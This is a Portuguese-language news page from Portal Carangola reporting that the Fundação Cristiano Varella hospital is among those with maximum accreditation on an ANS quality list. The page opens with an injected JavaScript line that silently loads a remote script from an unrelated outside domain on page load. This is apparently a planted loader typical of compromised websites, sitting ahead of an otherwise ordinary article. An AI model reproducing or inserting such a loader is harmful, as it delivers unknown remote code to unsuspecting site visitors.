;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fundação Cristiano Varella está entre os Hospitais com acreditação máxima divulgados pela ANS - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Fundação Cristiano Varella está entre os Hospitais com acreditação máxima divulgados pela ANS

FCV

A Agência Nacional de Saúde Suplementar, ANS, divulgou nesta segunda-feira, a lista de hospitais que atendem critérios de qualidade importantes para aferir o padrão de assistência prestada à população. Segundo as informações do site da ANS, os dados mostram o desempenho dos estabelecimentos segundo três indicadores: acreditação, índice de readmissão hospitalar e segurança do paciente.

E dentre os Hospitais com acreditação máxima está a Fundação Cristiano Varella! Isso significa que no processo de avaliação realizado nos recursos e processos adotados pelas instituições, além da medição da qualidade da assistência oferecida pelo Hospital, nós estamos entre os melhores!

Esse reconhecimento, motivo de grande orgulho para nossa instituição, foi conquistado em 2014 quando nos tornamos ONA nível III, o maior nível de Acreditação reconhecido pelo Ministério da Saúde. O princípio deste nível é a “excelência em gestão”. Uma organização, serviço ou programa de saúde Acreditado com Excelência além de atender aos requisitos dos níveis 1 e 2, possui uma cultura organizacional pela busca contínua da melhoria, com resultados positivos e uma performance que vai ao encontro de toda a organização.

Ainda segundo matéria publicada pela Agência, “A qualidade é prioritária para a ANS e esta classificação dos hospitais traz transparência e segurança para o sistema de saúde”, destaca a diretora de Desenvolvimento Setorial da ANS, Martha Oliveira.

A lista completa com todos os nomes divulgados pode ser conferida no link: http://www.ans.gov.br/aans/noticias-ans/qualidade-da-saude/3245-ans-divulga-lista-de-hospitais-que-atendem-criterios-de-qualidade

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.